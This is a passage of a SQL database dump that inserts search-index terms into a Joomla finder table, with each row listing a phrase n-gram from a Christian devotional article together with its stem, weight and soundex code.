(300116, 'yourself to do', 'yourself to do', 0, 1, 1.4667, 'Y62413', 1, '*'),
(300117, 'yourself wrong', 'yourself wrong', 0, 1, 1.4667, 'Y6241652', 1, '*'),
(300118, 'yourself wrong people', 'yourself wrong people', 0, 1, 1.7, 'Y624165214', 1, '*'),
(300119, 'youthful', 'youth', 0, 0, 0.5333, 'Y314', 1, '*'),
(300120, 'youthful enhancement', 'youth enhancement', 0, 1, 1.6667, 'Y3145253', 1, '*'),
(300121, 'youthful enhancement strategies', 'youth enhancement strategies', 0, 1, 2, 'Y314525323632', 1, '*'),
(300333, '.” till', '.” till', 0, 1, 1.2333, '”340', 1, '*'),
(300334, '.” till next', '.” till next', 0, 1, 1.4, '”34523', 1, '*'),
(300335, '1 18', '1 18', 0, 1, 1.1333, '', 1, '*'),
(300336, '1 18 when', '1 18 when', 0, 1, 1.3, 'W500', 1, '*'),
(300337, '1 20', '1 20', 0, 1, 1.1333, '', 1, '*'),
(300338, '1 20 and', '1 20 and', 0, 1, 1.2667, 'A530', 1, '*'),
(300339, '1 get', '1 get', 0, 1, 1.1667, 'G300', 1, '*'),
(300340, '1 get the', '1 get the', 0, 1, 1.3, 'G300', 1, '*'),
(300341, '18 when', '18 when', 0, 1, 1.2333, 'W500', 1, '*'),
(300342, '18 when you', '18 when you', 0, 1, 1.3667, 'W500', 1, '*'),
(300343, '19 eph', '19 eph', 0, 1, 1.2, 'E100', 1, '*'),
(300344, '19 eph 3', '19 eph 3', 0, 1, 1.2667, 'E100', 1, '*'),
(300345, '19 i', '19 i', 0, 1, 1.1333, 'I000', 1, '*'),
(300346, '19 i want', '19 i want', 0, 1, 1.3, 'I530', 1, '*'),
(300347, '2 3 .”', '2 3 .”', 0, 1, 1.2, '”000', 1, '*'),
(300348, '2 cor 1', '2 cor 1', 0, 1, 1.2333, 'C600', 1, '*'),
(300349, '2 tim', '2 tim', 0, 1, 1.1667, 'T500', 1, '*'),
(300350, '2 tim 1', '2 tim 1', 0, 1, 1.2333, 'T500', 1, '*'),
(300351, '2 walk', '2 walk', 0, 1, 1.2, 'W420', 1, '*'),
(300352, '2 walk the', '2 walk the', 0, 1, 1.3333, 'W423', 1, '*'),
(300353, '20 and “...because', '20 and “...because', 0, 1, 1.6, 'A5312', 1, '*'),
(300354, '3 .”', '3 .”', 0, 1, 1.1333, '”000', 1, '*'),
(300355, '3 .” till', '3 .” till', 0, 1, 1.3, '”340', 1, '*'),
(300356, '3 19 i', '3 19 i', 0, 1, 1.2, 'I000', 1, '*'),
(300357, '3 receive', '3 receive', 0, 1, 1.3, 'R210', 1, '*'),
(300358, '3 receive the', '3 receive the', 0, 1, 1.4333, 'R213', 1, '*'),
(300359, '39 from', '39 from', 0, 1, 1.2333, 'F650', 1, '*'),
(300360, '39 from our', '39 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(300361, '4 19', '4 19', 0, 1, 1.1333, '', 1, '*'),
(300362, '4 19 eph', '4 19 eph', 0, 1, 1.2667, 'E100', 1, '*'),
(300363, 'a process', 'a process', 0, 1, 1.3, 'A162', 2, '*'),
(300364, 'a process the', 'a process the', 0, 1, 1.4333, 'A1623', 1, '*'),
(300365, 'a promise', 'a promise', 0, 1, 1.3, 'A1652', 1, '*'),
(300366, 'a promise prophecy', 'a promise prophecy', 0, 1, 1.6, 'A16521612', 1, '*'),
(300367, 'above the failure', 'abov the failure', 0, 1, 1.5667, 'A13146', 1, '*'),
(300368, 'across', 'across', 0, 0, 0.4, 'A262', 1, '*'),
(300369, 'across a', 'across a', 0, 1, 1.2667, 'A262', 1, '*'),
(300370, 'across a promise', 'across a promise', 0, 1, 1.5333, 'A2621652', 1, '*'),
(300371, 'activities some', 'activ some', 0, 1, 1.5, 'A231325', 1, '*'),
(300372, 'activities some christians', 'activ some christians', 0, 1, 1.8667, 'A231325262352', 1, '*'),
(300373, 'all god\'s', 'all god', 0, 1, 1.3, 'A4232', 1, '*'),
(300374, 'all god\'s promises', 'all god promises', 0, 1, 1.6, 'A42321652', 1, '*'),
(300375, 'all the forces', 'all the forces', 0, 1, 1.4667, 'A43162', 1, '*'),
(300376, 'all the provisions', 'all the provisions', 0, 1, 1.6, 'A43161252', 1, '*'),
(300377, 'alone you', 'alon you', 0, 1, 1.3, 'A450', 1, '*'),
(300378, 'alone you have', 'alon you have', 0, 1, 1.4667, 'A451', 1, '*'),
(300379, 'amen 2', 'amen 2', 0, 1, 1.2, 'A500', 1, '*'),
(300380, 'amen 2 cor', 'amen 2 cor', 0, 1, 1.3333, 'A526', 1, '*'),
(300381, 'and 3', 'and 3', 0, 1, 1.1667, 'A530', 1, '*'),
(300382, 'and 3 receive', 'and 3 receive', 0, 1, 1.4333, 'A53621', 1, '*'),
(300383, 'and amen', 'and amen', 0, 1, 1.2667, 'A535', 1, '*'),
(300384, 'and amen 2', 'and amen 2', 0, 1, 1.3333, 'A535', 1, '*'),
(300385, 'and i want', 'and i want', 0, 1, 1.3333, 'A5353', 1, '*'),
(300386, 'and the will', 'and the will', 0, 1, 1.4, 'A534', 1, '*'),
(300387, 'and without conception', 'and without conception', 0, 1, 1.7333, 'A53252135', 1, '*'),
(300388, 'and “...because', 'and “...because', 0, 1, 1.5, 'A5312', 1, '*'),
(300389, 'and “...because it', 'and “...because it', 0, 1, 1.6, 'A53123', 1, '*'),
(300390, 'any result', 'ani result', 0, 1, 1.3333, 'A56243', 1, '*'),
(300391, 'any result when', 'ani result when', 0, 1, 1.5, 'A562435', 1, '*'),
(300392, 'are not exploring', 'ar not exploring', 0, 1, 1.5667, 'A653214652', 1, '*'),
(300393, 'are suffering', 'ar suffering', 0, 1, 1.4333, 'A621652', 1, '*'),
(300394, 'are suffering today', 'ar suffering today', 0, 1, 1.6333, 'A6216523', 1, '*'),
(300395, 'are yea', 'ar yea', 0, 1, 1.2333, 'A600', 1, '*'),
(300396, 'are yea and', 'ar yea and', 0, 1, 1.3667, 'A653', 1, '*'),
(300397, 'as highlighted', 'as highlighted', 0, 1, 1.4667, 'A2423', 1, '*'),
(300398, 'as highlighted above', 'as highlighted above', 0, 1, 1.6667, 'A24231', 1, '*'),
(300399, 'assistance', 'assist', 0, 0, 0.6667, 'A2352', 1, '*'),
(300400, 'assistance of', 'assist of', 0, 1, 1.4333, 'A23521', 1, '*'),
(300401, 'assistance of heaven', 'assist of heaven', 0, 1, 1.6667, 'A235215', 1, '*'),
(300402, 'at your disposal', 'at your disposal', 0, 1, 1.5333, 'A3632124', 1, '*'),
(300403, 'available to', 'avail to', 0, 1, 1.4, 'A14143', 2, '*'),
(300404, 'available to get', 'avail to get', 0, 1, 1.5333, 'A1414323', 1, '*'),
(300405, 'be received', 'be received', 0, 1, 1.3667, 'B6213', 1, '*'),
(300406, 'be received by', 'be received by', 0, 1, 1.4667, 'B62131', 1, '*'),
(300407, 'because all', 'becaus all', 0, 1, 1.3667, 'B240', 1, '*'),
(300408, 'because all god\'s', 'becaus all god', 0, 1, 1.5667, 'B24232', 1, '*'),
(300409, 'because god has', 'becaus god has', 0, 1, 1.5, 'B232', 1, '*'),
(300410, 'because he is', 'becaus he is', 0, 1, 1.4333, 'B200', 1, '*'),
(300411, 'beloved develop', 'belov develop', 0, 1, 1.5, 'B413141', 1, '*'),
(300412, 'beloved develop faith', 'belov develop faith', 0, 1, 1.7, 'B4131413', 1, '*'),
(300413, 'beyond the realm', 'beyond the realm', 0, 1, 1.5333, 'B53645', 1, '*'),
(300414, 'but because they', 'but because they', 0, 1, 1.5333, 'B3123', 1, '*'),
(300415, 'but you can\'t', 'but you can', 0, 1, 1.4333, 'B3253', 1, '*'),
(300416, 'by faith where', 'by faith where', 0, 1, 1.4667, 'B360', 1, '*'),
(300417, 'can only be', 'can only be', 0, 1, 1.3667, 'C541', 1, '*'),
(300418, 'can only come', 'can only come', 0, 1, 1.4333, 'C5425', 1, '*'),
(300419, 'can\'t get from', 'can get from', 0, 1, 1.4667, 'C5323165', 1, '*'),
(300420, 'can\'t win', 'can win', 0, 1, 1.3, 'C535', 1, '*'),
(300421, 'can\'t win with', 'can win with', 0, 1, 1.4667, 'C5353', 1, '*'),
(300422, 'children is that', 'children is that', 0, 1, 1.5333, 'C436523', 1, '*'),
(300423, 'christian is due', 'christian is due', 0, 1, 1.5333, 'C623523', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(300424, 'christians are suffering', 'christian are suffering', 0, 1, 1.8, 'C62352621652', 1, '*'),
(300425, 'come across', 'come across', 0, 1, 1.3667, 'C5262', 1, '*'),
(300426, 'come across a', 'come across a', 0, 1, 1.4333, 'C5262', 1, '*'),
(300427, 'come it will', 'come it will', 0, 1, 1.4, 'C534', 1, '*'),
(300428, 'come through a', 'come through a', 0, 1, 1.4667, 'C5362', 1, '*'),
(300429, 'conception happens', 'concept happens', 0, 1, 1.6, 'C52135152', 1, '*'),
(300430, 'conception happens or', 'concept happens or', 0, 1, 1.7, 'C521351526', 1, '*'),
(300431, 'conception you', 'concept you', 0, 1, 1.4667, 'C52135', 1, '*'),
(300432, 'conception you should', 'concept you should', 0, 1, 1.7, 'C52135243', 1, '*'),
(300433, 'cor 1 20', 'cor 1 20', 0, 1, 1.2667, 'C600', 1, '*'),
(300434, 'dearly beloved develop', 'dearli beloved develop', 0, 1, 1.7333, 'D641413141', 1, '*'),
(300435, 'desired', 'desir', 0, 0, 0.4667, 'D263', 1, '*'),
(300436, 'desired result', 'desir result', 0, 1, 1.4667, 'D2636243', 1, '*'),
(300437, 'desired result and', 'desir result and', 0, 1, 1.6, 'D263624353', 1, '*'),
(300438, 'desired result from', 'desir result from', 0, 1, 1.6333, 'D2636243165', 1, '*'),
(300439, 'determine whether', 'determin whether', 0, 1, 1.5667, 'D6536', 1, '*'),
(300440, 'determine whether conception', 'determin whether conception', 0, 1, 1.9333, 'D6536252135', 1, '*'),
(300441, 'develop faith', 'develop faith', 0, 1, 1.4333, 'D1413', 1, '*'),
(300442, 'develop faith for', 'develop faith for', 0, 1, 1.5667, 'D141316', 1, '*'),
(300443, 'disposal', 'dispos', 0, 0, 0.5333, 'D2124', 1, '*'),
(300444, 'disposal to', 'dispos to', 0, 1, 1.3667, 'D21243', 1, '*'),
(300445, 'disposal to get', 'dispos to get', 0, 1, 1.5, 'D2124323', 1, '*'),
(300446, 'due to', 'due to', 0, 1, 1.2, 'D000', 1, '*'),
(300447, 'due to the', 'due to the', 0, 1, 1.3333, 'D000', 1, '*'),
(300448, 'earth knows', 'earth knows', 0, 1, 1.3667, 'E63252', 1, '*'),
(300449, 'earth knows how', 'earth knows how', 0, 1, 1.5, 'E63252', 1, '*'),
(300450, 'earthly activities', 'earthli activities', 0, 1, 1.6, 'E63423132', 1, '*'),
(300451, 'earthly activities some', 'earthli activities some', 0, 1, 1.7667, 'E634231325', 1, '*'),
(300452, 'engaging', 'engag', 0, 0, 0.5333, 'E5252', 1, '*'),
(300453, 'engaging the', 'engag the', 0, 1, 1.4, 'E52523', 1, '*'),
(300454, 'engaging the assistance', 'engag the assistance', 0, 1, 1.7667, 'E525232352', 1, '*'),
(300455, 'enhanced seed', 'enhanc seed', 0, 1, 1.4333, 'E52323', 1, '*'),
(300456, 'enhanced seed from', 'enhanc seed from', 0, 1, 1.6, 'E52323165', 1, '*'),
(300457, 'enlist', 'enlist', 0, 0, 0.4, 'E5423', 1, '*'),
(300458, 'enlist all', 'enlist all', 0, 1, 1.3333, 'E54234', 1, '*'),
(300459, 'enlist all the', 'enlist all the', 0, 1, 1.4667, 'E542343', 1, '*'),
(300460, 'eph 3', 'eph 3', 0, 1, 1.1667, 'E100', 1, '*'),
(300461, 'eph 3 19', 'eph 3 19', 0, 1, 1.2667, 'E100', 1, '*'),
(300462, 'everyone on', 'everyon on', 0, 1, 1.3667, 'E165', 1, '*'),
(300463, 'everyone on the', 'everyon on the', 0, 1, 1.5, 'E1653', 1, '*'),
(300464, 'expect', 'expect', 0, 0, 0.4, 'E2123', 1, '*'),
(300465, 'expect any', 'expect any', 0, 1, 1.3333, 'E21235', 1, '*'),
(300466, 'expect any result', 'expect any result', 0, 1, 1.5667, 'E212356243', 1, '*'),
(300467, 'exploring', 'explor', 0, 0, 0.6, 'E214652', 1, '*'),
(300468, 'exploring the', 'explor the', 0, 1, 1.4333, 'E2146523', 1, '*'),
(300469, 'exploring the means', 'explor the means', 0, 1, 1.6333, 'E214652352', 1, '*'),
(300470, 'failure of', 'failur of', 0, 1, 1.3333, 'F461', 1, '*'),
(300471, 'failure of many', 'failur of many', 0, 1, 1.5, 'F4615', 1, '*'),
(300472, 'faith for', 'faith for', 0, 1, 1.3, 'F316', 1, '*'),
(300473, 'faith for supernatural', 'faith for supernatural', 0, 1, 1.7333, 'F3162165364', 1, '*'),
(300474, 'faith where', 'faith where', 0, 1, 1.3667, 'F360', 1, '*'),
(300475, 'faith where you', 'faith where you', 0, 1, 1.5, 'F360', 1, '*'),
(300476, 'familiar', 'familiar', 0, 0, 0.5333, 'F546', 1, '*'),
(300477, 'father\'s heart 02', 'father heart 02', 0, 1, 1.5667, 'F36263', 2, '*'),
(300478, 'first three', 'first three', 0, 1, 1.3667, 'F6236', 1, '*'),
(300479, 'first three statements', 'first three statements', 0, 1, 1.7333, 'F623623532', 1, '*'),
(300480, 'follow these', 'follow these', 0, 1, 1.4, 'F432', 1, '*'),
(300481, 'follow these steps', 'follow these steps', 0, 1, 1.6, 'F432312', 1, '*'),
(300482, 'following points you', 'follow points you', 0, 1, 1.6667, 'F4521532', 1, '*'),
(300483, 'for his children', 'for his children', 0, 1, 1.5333, 'F624365', 1, '*'),
(300484, 'for supernatural', 'for supernatural', 0, 1, 1.5333, 'F62165364', 1, '*'),
(300485, 'for supernatural living', 'for supernatural living', 0, 1, 1.7667, 'F62165364152', 1, '*'),
(300486, 'for their needs', 'for their needs', 0, 1, 1.5, 'F636532', 1, '*'),
(300487, 'forces', 'forc', 0, 0, 0.4, 'F620', 2, '*'),
(300488, 'forces at', 'forc at', 0, 1, 1.3, 'F623', 1, '*'),
(300489, 'forces at your', 'forc at your', 0, 1, 1.4667, 'F6236', 1, '*'),
(300490, 'form but', 'form but', 0, 1, 1.2667, 'F6513', 1, '*'),
(300491, 'form but you', 'form but you', 0, 1, 1.4, 'F6513', 1, '*'),
(300492, 'from god 1', 'from god 1', 0, 1, 1.3333, 'F6523', 1, '*'),
(300493, 'from god through', 'from god through', 0, 1, 1.5333, 'F652362', 1, '*'),
(300494, 'from god\'s word', 'from god word', 0, 1, 1.5, 'F6523263', 1, '*'),
(300495, 'from him because', 'from him because', 0, 1, 1.5333, 'F6512', 1, '*'),
(300496, 'get from', 'get from', 0, 1, 1.2667, 'G3165', 1, '*'),
(300497, 'get from god', 'get from god', 0, 1, 1.4, 'G316523', 1, '*'),
(300498, 'get obtain', 'get obtain', 0, 1, 1.3333, 'G3135', 1, '*'),
(300499, 'get obtain your', 'get obtain your', 0, 1, 1.5, 'G31356', 1, '*'),
(300500, 'get the promise', 'get the promise', 0, 1, 1.5, 'G31652', 1, '*'),
(300501, 'get their', 'get their', 0, 1, 1.3, 'G360', 1, '*'),
(300502, 'get their needs', 'get their needs', 0, 1, 1.5, 'G36532', 1, '*'),
(300503, 'god 1', 'god 1', 0, 1, 1.1667, 'G300', 1, '*'),
(300504, 'god 1 get', 'god 1 get', 0, 1, 1.3, 'G323', 1, '*'),
(300505, 'god for his', 'god for his', 0, 1, 1.3667, 'G3162', 1, '*'),
(300506, 'god through a', 'god through a', 0, 1, 1.4333, 'G362', 1, '*'),
(300507, 'god\'s promises', 'god promises', 0, 1, 1.4667, 'G321652', 1, '*'),
(300508, 'god\'s promises prophecies', 'god promises prophecies', 0, 1, 1.8333, 'G3216521612', 1, '*'),
(300509, 'god\'s word or', 'god word or', 0, 1, 1.4333, 'G32636', 1, '*'),
(300510, 'hab', 'hab', 0, 0, 0.2, 'H100', 1, '*'),
(300511, 'hab 2', 'hab 2', 0, 1, 1.1667, 'H100', 1, '*'),
(300512, 'hab 2 3', 'hab 2 3', 0, 1, 1.2333, 'H100', 1, '*'),
(300513, 'happens or', 'happen or', 0, 1, 1.3333, 'H1526', 1, '*'),
(300514, 'happens or not', 'happen or not', 0, 1, 1.4667, 'H152653', 1, '*'),
(300515, 'has made available', 'ha made available', 0, 1, 1.6, 'H2531414', 1, '*'),
(300516, 'has not provided', 'ha not provided', 0, 1, 1.5333, 'H2531613', 1, '*'),
(300517, 'have to start', 'have to start', 0, 1, 1.4333, 'H132363', 1, '*'),
(300518, 'he is the', 'he is the', 0, 1, 1.3, 'H230', 1, '*'),
(300519, 'heaven in', 'heaven in', 0, 1, 1.3, 'H150', 1, '*'),
(300520, 'heaven in your', 'heaven in your', 0, 1, 1.4667, 'H156', 1, '*'),
(300521, 'highlighted', 'highlight', 0, 0, 0.7333, 'H2423', 2, '*'),
(300522, 'highlighted above', 'highlight above', 0, 1, 1.5667, 'H24231', 1, '*'),
(300523, 'highlighted above the', 'highlight above the', 0, 1, 1.7, 'H242313', 1, '*'),
(300524, 'him because', 'him because', 0, 1, 1.3667, 'H512', 1, '*'),
(300525, 'him because he', 'him because he', 0, 1, 1.4667, 'H512', 1, '*'),
(300526, 'his children is', 'hi children is', 0, 1, 1.5, 'H243652', 1, '*'),
(300527, 'holy spirit 2', 'holi spirit 2', 0, 1, 1.4333, 'H42163', 1, '*'),
(300528, 'how they get', 'how they get', 0, 1, 1.4, 'H323', 1, '*'),
(300529, 'in obtaining', 'in obtaining', 0, 1, 1.4, 'I51352', 1, '*'),
(300530, 'in obtaining your', 'in obtaining your', 0, 1, 1.5667, 'I513526', 1, '*'),
(300531, 'in seed', 'in seed', 0, 1, 1.2333, 'I523', 1, '*'),
(300532, 'in seed form', 'in seed form', 0, 1, 1.4, 'I523165', 1, '*'),
(300533, 'in the right', 'in the right', 0, 1, 1.4, 'I53623', 1, '*'),
(300534, 'in your earthly', 'in your earthly', 0, 1, 1.5, 'I5634', 1, '*'),
(300535, 'involved in obtaining', 'involv in obtaining', 0, 1, 1.7, 'I5141351352', 1, '*'),
(300536, 'is due', 'is due', 0, 1, 1.2, 'I230', 1, '*'),
(300537, 'is due to', 'is due to', 0, 1, 1.3, 'I230', 1, '*'),
(300538, 'is engaging', 'is engaging', 0, 1, 1.3667, 'I25252', 1, '*'),
(300539, 'is engaging the', 'is engaging the', 0, 1, 1.5, 'I252523', 1, '*'),
(300540, 'is that we', 'is that we', 0, 1, 1.3333, 'I230', 1, '*'),
(300541, 'is the only', 'is the only', 0, 1, 1.3667, 'I2354', 1, '*'),
(300542, 'is the product', 'is the product', 0, 1, 1.4667, 'I2316323', 1, '*'),
(300543, 'is wisdom for', 'is wisdom for', 0, 1, 1.4333, 'I23516', 1, '*'),
(300544, 'it is wisdom', 'it is wisdom', 0, 1, 1.4, 'I3235', 1, '*'),
(300545, 'it will not', 'it will not', 0, 1, 1.3667, 'I3453', 1, '*'),
(300546, 'it will surely', 'it will surely', 0, 1, 1.4667, 'I34264', 1, '*'),
(300547, 'item 39', 'item 39', 0, 1, 1.2333, 'I350', 1, '*'),
(300548, 'item 39 from', 'item 39 from', 0, 1, 1.4, 'I35165', 1, '*'),
(300549, 'k2 item 39', 'k2 item 39', 0, 1, 1.3333, 'K350', 1, '*'),
(300550, 'know that all', 'know that all', 0, 1, 1.4333, 'K534', 1, '*'),
(300551, 'knows how', 'know how', 0, 1, 1.3, 'K520', 1, '*'),
(300552, 'knows how they', 'know how they', 0, 1, 1.4667, 'K523', 1, '*'),
(300553, 'learn the', 'learn the', 0, 1, 1.3, 'L653', 1, '*'),
(300554, 'learn the steps', 'learn the steps', 0, 1, 1.5, 'L6532312', 1, '*'),
(300555, 'life can', 'life can', 0, 1, 1.2667, 'L125', 1, '*'),
(300556, 'life can only', 'life can only', 0, 1, 1.4333, 'L1254', 1, '*'),
(300557, 'living everyone', 'live everyone', 0, 1, 1.5, 'L152165', 1, '*'),
(300558, 'living everyone on', 'live everyone on', 0, 1, 1.6, 'L152165', 1, '*'),
(300559, 'living is', 'live is', 0, 1, 1.3, 'L152', 1, '*'),
(300560, 'living is engaging', 'live is engaging', 0, 1, 1.6, 'L1525252', 1, '*'),
(300561, 'lord through', 'lord through', 0, 1, 1.4, 'L6362', 1, '*'),
(300562, 'lord through the', 'lord through the', 0, 1, 1.5333, 'L63623', 1, '*'),
(300563, 'made available', 'made available', 0, 1, 1.4667, 'M31414', 1, '*'),
(300564, 'made available to', 'made available to', 0, 1, 1.5667, 'M314143', 1, '*'),
(300565, 'make will', 'make will', 0, 1, 1.3, 'M240', 1, '*'),
(300566, 'make will determine', 'make will determine', 0, 1, 1.6333, 'M24365', 1, '*'),
(300567, 'many a christian', 'mani a christian', 0, 1, 1.5333, 'M26235', 1, '*'),
(300568, 'means god', 'mean god', 0, 1, 1.3, 'M230', 1, '*'),
(300569, 'means god has', 'mean god has', 0, 1, 1.4333, 'M232', 1, '*'),
(300570, 'met', 'met', 0, 0, 0.2, 'M300', 1, '*'),
(300571, 'met and', 'met and', 0, 1, 1.2333, 'M353', 1, '*'),
(300572, 'met and the', 'met and the', 0, 1, 1.3667, 'M353', 1, '*'),
(300573, 'met it', 'met it', 0, 1, 1.2, 'M300', 1, '*'),
(300574, 'met it is', 'met it is', 0, 1, 1.3, 'M320', 1, '*'),
(300575, 'need to follow', 'need to follow', 0, 1, 1.4667, 'N314', 1, '*'),
(300576, 'needs but', 'need but', 0, 1, 1.3, 'N3213', 1, '*'),
(300577, 'needs but because', 'need but because', 0, 1, 1.5667, 'N321312', 1, '*'),
(300578, 'needs from', 'need from', 0, 1, 1.3333, 'N32165', 1, '*'),
(300579, 'needs from him', 'need from him', 0, 1, 1.4667, 'N32165', 1, '*'),
(300580, 'needs met', 'need met', 0, 1, 1.3, 'N3253', 1, '*'),
(300581, 'needs met and', 'need met and', 0, 1, 1.4333, 'N325353', 1, '*'),
(300582, 'needs met it', 'need met it', 0, 1, 1.4, 'N3253', 1, '*'),
(300583, 'not and', 'not and', 0, 1, 1.2333, 'N353', 1, '*'),
(300584, 'not and without', 'not and without', 0, 1, 1.5, 'N353', 1, '*'),
(300585, 'not because', 'not because', 0, 1, 1.3667, 'N312', 1, '*'),
(300586, 'not because god', 'not because god', 0, 1, 1.5, 'N3123', 1, '*'),
(300587, 'not expect', 'not expect', 0, 1, 1.3333, 'N32123', 1, '*'),
(300588, 'not expect any', 'not expect any', 0, 1, 1.4667, 'N321235', 1, '*'),
(300589, 'not exploring', 'not exploring', 0, 1, 1.4333, 'N3214652', 1, '*'),
(300590, 'not exploring the', 'not exploring the', 0, 1, 1.5667, 'N32146523', 1, '*'),
(300591, 'not provided', 'not provided', 0, 1, 1.4, 'N31613', 1, '*'),
(300592, 'not provided for', 'not provided for', 0, 1, 1.5333, 'N3161316', 1, '*'),
(300593, 'not tarry', 'not tarry', 0, 1, 1.3, 'N360', 1, '*'),
(300594, 'not tarry hab', 'not tarry hab', 0, 1, 1.4333, 'N361', 1, '*'),
(300595, 'note the', 'note the', 0, 1, 1.2667, 'N300', 1, '*'),
(300596, 'note the following', 'note the following', 0, 1, 1.6, 'N31452', 1, '*'),
(300597, 'obtain the', 'obtain the', 0, 1, 1.3333, 'O1353', 1, '*'),
(300598, 'obtain the product', 'obtain the product', 0, 1, 1.6, 'O135316323', 1, '*'),
(300599, 'obtain your', 'obtain your', 0, 1, 1.3667, 'O1356', 1, '*'),
(300600, 'obtain your desired', 'obtain your desired', 0, 1, 1.6333, 'O13563263', 1, '*'),
(300601, 'obtaining', 'obtain', 0, 0, 0.6, 'O1352', 1, '*'),
(300602, 'obtaining your', 'obtain your', 0, 1, 1.4667, 'O13526', 1, '*'),
(300603, 'obtaining your desired', 'obtain your desired', 0, 1, 1.7333, 'O135263263', 1, '*'),
(300604, 'of heaven in', 'of heaven in', 0, 1, 1.4, 'O150', 1, '*'),
(300605, 'of many a', 'of many a', 0, 1, 1.3, 'O150', 1, '*'),
(300606, 'of the familiar', 'of the familiar', 0, 1, 1.5, 'O131546', 1, '*'),
(300607, 'of the order', 'of the order', 0, 1, 1.4, 'O13636', 1, '*'),
(300608, 'only be received', 'onli be received', 0, 1, 1.5333, 'O5416213', 1, '*'),
(300609, 'only come', 'onli come', 0, 1, 1.3, 'O5425', 1, '*'),
(300610, 'only come through', 'onli come through', 0, 1, 1.5667, 'O5425362', 1, '*'),
(300611, 'only unfailing', 'onli unfailing', 0, 1, 1.4667, 'O5451452', 1, '*'),
(300612, 'only unfailing source', 'onli unfailing source', 0, 1, 1.7, 'O545145262', 1, '*'),
(300613, 'operate beyond', 'oper beyond', 0, 1, 1.4667, 'O163153', 1, '*'),
(300614, 'operate beyond the', 'oper beyond the', 0, 1, 1.6, 'O163153', 1, '*'),
(300615, 'or not and', 'or not and', 0, 1, 1.3333, 'O65353', 1, '*'),
(300616, 'or your prophecy', 'or your prophecy', 0, 1, 1.5333, 'O61612', 1, '*'),
(300617, 'order as', 'order as', 0, 1, 1.2667, 'O6362', 1, '*'),
(300618, 'order as highlighted', 'order as highlighted', 0, 1, 1.6667, 'O6362423', 1, '*'),
(300619, 'order note', 'order note', 0, 1, 1.3333, 'O63653', 1, '*'),
(300620, 'order note the', 'order note the', 0, 1, 1.4667, 'O63653', 1, '*'),
(300621, 'order to obtain', 'order to obtain', 0, 1, 1.5, 'O6363135', 1, '*'),
(300622, 'our needs', 'our needs', 0, 1, 1.3, 'O6532', 1, '*'),
(300623, 'our needs from', 'our needs from', 0, 1, 1.4667, 'O6532165', 1, '*'),
(300624, 'phi', 'phi', 0, 0, 0.2, 'P000', 1, '*'),
(300625, 'phi 4', 'phi 4', 0, 1, 1.1667, 'P000', 1, '*'),
(300626, 'phi 4 19', 'phi 4 19', 0, 1, 1.2667, 'P000', 1, '*'),
(300627, 'points you', 'point you', 0, 1, 1.3333, 'P532', 1, '*'),
(300628, 'points you can\'t', 'point you can', 0, 1, 1.5333, 'P53253', 1, '*'),
(300629, 'process in', 'process in', 0, 1, 1.3333, 'P625', 1, '*'),
(300630, 'process in order', 'process in order', 0, 1, 1.5333, 'P625636', 1, '*'),
(300631, 'process required', 'process required', 0, 1, 1.5333, 'P626263', 1, '*'),
(300632, 'process required and', 'process required and', 0, 1, 1.6667, 'P62626353', 1, '*'),
(300633, 'process stay', 'process stay', 0, 1, 1.4, 'P623', 1, '*'),
(300634, 'process stay put', 'process stay put', 0, 1, 1.5333, 'P62313', 1, '*'),
(300635, 'process the', 'process the', 0, 1, 1.3667, 'P623', 1, '*'),
(300636, 'process the promise', 'process the promise', 0, 1, 1.6333, 'P6231652', 1, '*'),
(300637, 'product', 'product', 0, 0, 0.4667, 'P6323', 1, '*'),
(300638, 'product 2', 'product 2', 0, 1, 1.3, 'P6323', 1, '*'),
(300639, 'product 2 tim', 'product 2 tim', 0, 1, 1.4333, 'P63235', 1, '*'),
(300640, 'product in', 'product in', 0, 1, 1.3333, 'P63235', 1, '*'),
(300641, 'product in seed', 'product in seed', 0, 1, 1.5, 'P6323523', 1, '*'),
(300642, 'product you', 'product you', 0, 1, 1.3667, 'P6323', 1, '*'),
(300643, 'product you need', 'product you need', 0, 1, 1.5333, 'P632353', 1, '*'),
(300644, 'promise prophecy', 'promis prophecy', 0, 1, 1.5333, 'P6521612', 1, '*'),
(300645, 'promise prophecy alone', 'promis prophecy alone', 0, 1, 1.7333, 'P652161245', 1, '*'),
(300646, 'promise prophecy is', 'promis prophecy is', 0, 1, 1.6333, 'P6521612', 1, '*'),
(300647, 'promise prophecy the', 'promis prophecy the', 0, 1, 1.6667, 'P65216123', 1, '*'),
(300648, 'promise prophecy what', 'promis prophecy what', 0, 1, 1.7, 'P65216123', 1, '*'),
(300649, 'promise the', 'promis the', 0, 1, 1.3667, 'P6523', 1, '*'),
(300650, 'promise the seed', 'promis the seed', 0, 1, 1.5333, 'P652323', 1, '*'),
(300651, 'promises prophecies', 'promis prophecies', 0, 1, 1.6333, 'P6521612', 1, '*'),
(300652, 'promises prophecies are', 'promis prophecies are', 0, 1, 1.7667, 'P65216126', 1, '*'),
(300653, 'prophecies are', 'propheci are', 0, 1, 1.4667, 'P6126', 1, '*'),
(300654, 'prophecies are yea', 'propheci are yea', 0, 1, 1.6, 'P6126', 1, '*'),
(300655, 'prophecy alone', 'propheci alone', 0, 1, 1.4667, 'P61245', 1, '*'),
(300656, 'prophecy alone you', 'propheci alone you', 0, 1, 1.6, 'P61245', 1, '*'),
(300657, 'prophecy enhanced', 'propheci enhanced', 0, 1, 1.5667, 'P612523', 1, '*'),
(300658, 'prophecy enhanced seed', 'propheci enhanced seed', 0, 1, 1.7333, 'P61252323', 1, '*'),
(300659, 'prophecy is', 'propheci is', 0, 1, 1.3667, 'P612', 1, '*'),
(300660, 'prophecy is the', 'propheci is the', 0, 1, 1.5, 'P6123', 1, '*'),
(300661, 'prophecy the', 'propheci the', 0, 1, 1.4, 'P6123', 1, '*'),
(300662, 'prophecy the first', 'propheci the first', 0, 1, 1.6, 'P61231623', 1, '*'),
(300663, 'prophecy what', 'propheci what', 0, 1, 1.4333, 'P6123', 1, '*'),
(300664, 'prophecy what can', 'propheci what can', 0, 1, 1.5667, 'P612325', 1, '*'),
(300665, 'provided', 'provid', 0, 0, 0.5333, 'P613', 1, '*'),
(300666, 'provided for', 'provid for', 0, 1, 1.4, 'P61316', 1, '*'),
(300667, 'provided for their', 'provid for their', 0, 1, 1.6, 'P6131636', 1, '*'),
(300668, 'provisions', 'provis', 0, 0, 0.6667, 'P61252', 1, '*'),
(300669, 'provisions of', 'provis of', 0, 1, 1.4333, 'P612521', 1, '*'),
